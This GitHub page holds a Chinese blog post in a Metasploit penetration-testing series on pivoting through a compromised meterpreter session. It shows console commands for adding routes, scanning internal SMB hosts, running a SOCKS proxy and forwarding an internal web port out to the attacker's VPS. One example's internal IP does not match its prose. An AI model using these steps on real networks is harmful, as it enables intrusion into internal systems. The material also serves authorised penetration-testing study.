Skip to content

Latest commit

 

History

History
71 lines (49 loc) · 3.64 KB

15552554851482.md

File metadata and controls

71 lines (49 loc) · 3.64 KB

#MSF内网渗透系列——穿越边界

tags: 没有分类,

MSF内网渗透系列——穿越边界

前篇系列文章发出以后,很多新接触MSF小伙伴会有疑问:MSF做内网渗透总不能在内网找个机器安装一个MSF吧,这当然是可以的。还有小伙伴想到可以利用proxychain把MSF代理到目标内网,这也没毛病。

下面我就介绍几个MSF自身穿越边界的姿势。

假设我们在VPS上搭建了MSF,已经在目标内网中反弹回了一个meterpreter。那么我们就可以利用这个shell建立一条内网访问通道

情景一:利用MSF扫描目标内网smb_version

pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到目标内网环境

sessions一下看看我们shell的信息:如下 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 。msf exploit(web_delivery) > sessions 。 。Active sessions 。=============== 。 。 Id Type Information Connection 。 -- ---- ----------- ---------- 。 1 meterpreter python/linux user @ test 8.8.8.8:443 -> 101.101.101.101:35272 (10.10.10.10) 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

我们发现session的ID为1,内网ip为10.10.10.10

那么就可以在metasploit添加一个路由表,目的是访问10.10.10.11将通过meterpreter的session 1 来访问,如下: 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 。msf exploit(web_delivery) > route add 10.10.10.11 255.255.255.255 1 //route add 目标i或ip段 掩码 session的ID 。 。[*] Route added 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

然后我们就可以: 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 。msf exploit(web_delivery) > use auxiliary/scanner/smb/smb_version 。 。msf auxiliary(smb_version) > set rhosts 10.10.10.11 //如果想扫面整个C段 set rhosts 10.10.10.11/24 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

如果我们想让其他一些工具(如:Nmap)利用该路由表到目标内网搞事情呢?

这里MSF的socks4a模块就可以提供一个监听隧道供其他应用程序访问:auxiliary/server/socks4a

情景二:访问目标内网一个服务器(10.10.10.12)80端口的web应用

我们可以利用meterpreter的portfwd把内网web服务器的80端口转发到我们VPS(8.8.8.8)的8088端口。然后我们就可以通过http://8.8.8.8:8088/访问http://10.10.10.12:80

首先session -i 1进入meterpreter,然后做端口转发,如下: 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 。msf auxiliary(smb_version) > sessions -i 1 。[] Starting interaction with 1... 。 。meterpreter > portfwd add -l 8088 -r 192.168.31.169 -p 80 。[] Local TCP relay created: :8088 <-> 192.168.31.169:80 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

后记:在整理这篇文章的时候,就想着出个番外篇,专门整理一下其他穿越边界的各种姿势